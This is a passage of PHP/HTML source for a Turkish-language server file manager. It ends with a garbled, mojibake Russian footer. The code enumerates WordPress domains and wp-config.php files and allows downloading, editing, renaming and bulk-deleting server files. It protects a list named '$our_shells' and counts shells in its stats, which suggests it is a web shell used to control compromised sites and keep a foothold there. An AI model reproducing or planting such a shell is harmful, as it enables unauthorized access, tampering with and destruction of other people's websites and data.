<div><button type="button" onclick="downloadFile('<?php echo addslashes($plugin['path']); ?>')">İndir</button><button type="button" onclick="showRenameModal('<?php echo addslashes($plugin['path']); ?>','<?php echo addslashes($plugin['name']); ?>')">Adlandır</button><a href="?dir=<?php echo urlencode($plugin['path']); ?>" class="button">İncele</a></div></div> <?php endforeach; ?> </div></div> <?php endif; ?> <?php if($wp_domain_count > 0): ?> <div class="delete-section" style="border-left-color:#00a8ff;"> <div class="delete-title" onclick="toggleSection(this)" style="color:#00a8ff;">📊 WordPress Kurulu Domainler (<?php echo $wp_domain_count; ?> adet)<span class="toggle-arrow">▼</span></div> <div class="delete-body"><?php foreach($wp_domains_list as $wp): ?> <div class="row"><div class="checkbox-column"></div><div class="name">📁 <?php echo htmlspecialchars($wp['path']); ?><?php if($wp['has_wp_config']): ?><span class="wp-badge">wp-config.php</span><?php endif; ?></div><div><a href="?dir=<?php echo urlencode($wp['path']); ?>" class="button">📂 Aç</a></div></div> <?php endforeach; ?></div> </div> <?php endif; ?> <form method="post" onsubmit="bulkDeleteAjax(); return false;"> <input type="hidden" name="action" value="bulk_delete"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <div class="list-header"><div><input type="checkbox" onclick="toggleAll(this)"> <strong>Tümünü Seç</strong></div><button type="submit" class="danger">🗑 Seçileni Sil</button></div> <h3>📁 Klasörler</h3> <?php foreach ($folders as $folder): $path = $current_dir.'/'.$folder; $is_protected = in_array($folder, $wordpress_core_dirs) \|\| in_array($folder, $our_shells); ?> <div class="row <?php if($is_protected) echo 'protected'; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if($is_protected) echo 'disabled'; ?>></div> <div class="name">📁 <a href="?dir=<?php echo urlencode($path); ?>"><?php echo htmlspecialchars($folder); ?></a><?php if(in_array($folder, $wordpress_core_dirs)): ?><span class="wp-badge">WORDPRESS</span><?php endif; ?></div> <div><button type="button" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button></div> </div> <?php endforeach; ?> <h3>📄 Dosyalar</h3> <?php foreach ($files as $file): $path = $current_dir.'/'.$file; $editUrl = '?editf='.base64_encode($path).'&dir='.urlencode($current_dir); $is_protected = in_array($file, $protected_files) \|\| in_array($file, $wordpress_core_files) \|\| in_array($file, $our_shells); $is_malicious = false; if(!$is_protected && isset($_SESSION['malicious'])){ foreach($_SESSION['malicious'] as $m){ if($m['path']==$path){ $is_malicious=true; break; } } } $row_class = $is_protected ? 'protected' : ($is_malicious ? 'malicious' : ''); ?> <div class="row <?php echo $row_class; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if($is_protected) echo 'disabled'; ?>></div> <div class="name">📄 <?php echo htmlspecialchars($file); ?><?php if($is_protected): ?><span class="protected-badge">KORUNAN</span><?php endif; ?><?php if($is_malicious): ?><span class="malicious-badge">ZARARLI</span><?php endif; ?></div> <div class="inline-controls"> <button type="button" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button> <?php if(!$is_protected): ?><button type="button" onclick="showRenameModal('<?php echo addslashes($path); ?>','<?php echo addslashes($file); ?>')">✏️ Adlandır</button><?php endif; ?> <a class="button edit-btn" href="<?php echo $editUrl; ?>">✏️ Düzenle</a> </div> </div> <?php endforeach; ?> <div class="list-header"><div></div><button type="submit" class="danger">🗑 Seçileni Sil</button></div> </form> <div id="renameModal" class="modal"><div class="modal-content"> <h3>📝 Dosya/Klasör Adını Değiştir</h3> <form method="post"><input type="hidden" name="action" value="rename"><input type="hidden" name="old" id="rename_old"><input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"><p style="margin-bottom:8px;">Yeni isim:</p><input type="text" name="new" id="rename_new" required style="width:100%; padding:10px; margin-bottom:15px; background:#1e272e; border:1px solid #40739e; color:#fff; border-radius:6px;"><div style="display:flex; gap:10px; justify-content:flex-end;"><button type="button" onclick="hideRenameModal()">İptal</button><button type="submit" class="success">Değiştir</button></div></form> </div></div> <?php if ($file_to_edit && file_exists($file_to_edit)): $is_protected = in_array(basename($file_to_edit), $protected_files) \|\| in_array(basename($file_to_edit), $wordpress_core_files) \|\| in_array(basename($file_to_edit), $our_shells); $file_content = htmlspecialchars(file_get_contents($file_to_edit)); $line_count = substr_count($file_content, "\n") + 1; ?> <hr> <div class="editor-container"> <div class="editor-header"><div class="editor-title">✏️ Düzenleniyor: <code><?php echo htmlspecialchars(basename($file_to_edit)); ?></code><span style="font-size:11px; color:#888; margin-left:10px;">(<?php echo number_format(filesize($file_to_edit)); ?> bytes, <?php echo $line_count; ?> satır)</span></div><div class="editor-buttons"><button type="button" class="copy-btn" onclick="copyToClipboard()">📋 Kopyala</button><a href="?dir=<?php echo urlencode($_GET['dir'] ?? $current_dir); ?>" class="button cancel-btn">✖️ İptal</a></div></div> <?php if($is_protected): ?><div class="warning-box">Bu dosya KORUNAN bir dosyadır! Düzenlemek sitenin çalışmasını bozabilir. Dikkatli olun!</div><?php endif; ?> <form id="editor-form" onsubmit="saveFile(); return false;"><textarea id="editor-content" name="content" class="editor-textarea" spellcheck="false"><?php echo $file_content; ?></textarea><input type="hidden" id="edit-file" name="file" value="<?php echo htmlspecialchars($file_to_edit); ?>"><input type="hidden" id="current-dir" name="current_dir" value="<?php echo htmlspecialchars($_GET['dir'] ?? $current_dir); ?>"><div class="editor-info"><div>📁 <span><?php echo htmlspecialchars($file_to_edit); ?></span></div><div>💾 Son değişiklik: <span><?php echo date('Y-m-d H:i:s', filemtime($file_to_edit)); ?></span></div><div><button type="submit" class="save-btn" style="background:#44bd32; color:#000; padding:6px 20px;">💾 KAYDET</button></div></div></form> </div> <?php endif; ?> <?php if(!empty($analysis)): ?> <hr><h3>🔍 Dosya Analizi: <?php echo htmlspecialchars(basename($analysis_file)); ?></h3> <div class="pre-box"><?php echo nl2br(htmlspecialchars($analysis)); ?></div> <?php endif; ?> <div class="stats"> <div class="stat-item"><div class="stat-value"><?php echo count($files); ?></div><div class="stat-label">Dosya</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($folders); ?></div><div class="stat-label">Klasör</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($malicious_files); ?></div><div class="stat-label">Zararlı</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($our_shells); ?></div><div class="stat-label">Shell</div></div> <div class="stat-item"><div class="stat-value" style="color:#00a8ff;"><?php echo $wp_domain_count; ?></div><div class="stat-label">WordPress Domain</div></div> </div> </div> <div id="loading-overlay" class="loading-overlay"><div class="spinner"></div></div> </body> </html>

| ver. 1.1 | | . | PHP 8.4.20 | Ð“ÐµÐ½ÐµÑ€Ð°Ñ†Ð¸Ñ ÑÑ‚Ñ€Ð°Ð½Ð¸Ñ†Ñ‹: 0 | proxy | phpinfo | ÐÐ°ÑÑ‚Ñ€Ð¾Ð¹ÐºÐ°